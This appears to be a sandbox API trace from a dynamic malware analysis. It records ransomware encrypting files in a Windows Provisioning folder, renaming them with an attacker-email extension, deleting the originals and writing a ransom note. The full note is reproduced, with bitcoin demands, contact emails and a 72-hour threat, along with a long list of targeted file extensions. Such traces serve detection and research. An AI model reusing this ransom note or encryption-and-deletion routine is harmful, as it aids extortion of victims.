	[0175.527] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9670) returned 1
	[0175.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.527] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0xda6, dwBufLen=0xda6 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0xdb0) returned 1
	[0175.527] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.528] RtlMoveMemory (in: Destination=0xfdef38, Source=0xfde188, Length=0xda6 | out: Destination=0xfdef38) 
	[0175.528] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.528] CryptEncrypt (in: hKey=0xfb9670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdef38*, pdwDataLen=0x18a1ec*=0xda6, dwBufLen=0xdb0 | out: pbData=0xfdef38*, pdwDataLen=0x18a1ec*=0xdb0) returned 1
	[0175.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.529] CryptDestroyKey (hKey=0xfb9670) returned 1
	[0175.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.529] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0175.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.529] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0175.530] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.530] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.531] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0175.532] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0175.532] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.533] WriteFile (in: hFile=0x39c, lpBuffer=0xfdef38*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdef38*, lpNumberOfBytesWritten=0x18a648*=0xdb0, lpOverlapped=0x0) returned 1
	[0175.536] CloseHandle (hObject=0x39c) returned 1
	[0175.536] CloseHandle (hObject=0x390) returned 1
	[0175.536] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml")) returned 1
	[0175.540] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml")) returned 0
	[0175.540] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0f1f13f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0f1f13f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0f1f13f, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0175.540] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0175.540] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0175.540] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\"
	[0175.540] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml"
	[0175.540] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml") returned 100
	[0175.541] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0175.541] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml") returned 0x64
	[0175.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.542] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0175.542] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"
	[0175.543] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml") returned 100
	[0175.543] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.543] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0175.543] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0175.544] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0175.544] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.544] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.544] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0175.545] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0175.548] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.549] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcba18) returned 1
	[0175.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.551] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0175.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.551] CryptHashData (hHash=0xfb92b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0175.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.551] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb92b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb91f0) returned 1
	[0175.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.552] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0175.552] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.552] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0175.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.552] CryptEncrypt (in: hKey=0xfb91f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0175.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.553] CryptDestroyKey (hKey=0xfb91f0) returned 1
	[0175.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.553] CryptDestroyHash (hHash=0xfb92b0) returned 1
	[0175.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.554] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0175.554] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0175.554] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.555] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.555] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0175.556] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0175.556] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0175.557] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0175.560] CloseHandle (hObject=0x39c) returned 1
	[0175.560] CloseHandle (hObject=0x390) returned 1
	[0175.561] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml")) returned 1
	[0175.564] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml")) returned 0
	[0175.564] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0175.564] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdbec4a8, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbdbec4a8, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbdbec4a8, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0175.564] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0175.565] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0175.565] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}"
	[0175.565] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*"
	[0175.565] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0175.566] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0175.566] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\HELP_DECRYPT_YOUR_FILES.TXT") returned 108
	[0175.566] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0175.566] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0175.566] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0175.569] CloseHandle (hObject=0x388) returned 1
	[0175.569] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0175.570] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0175.570] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0175.578] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0175.579] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
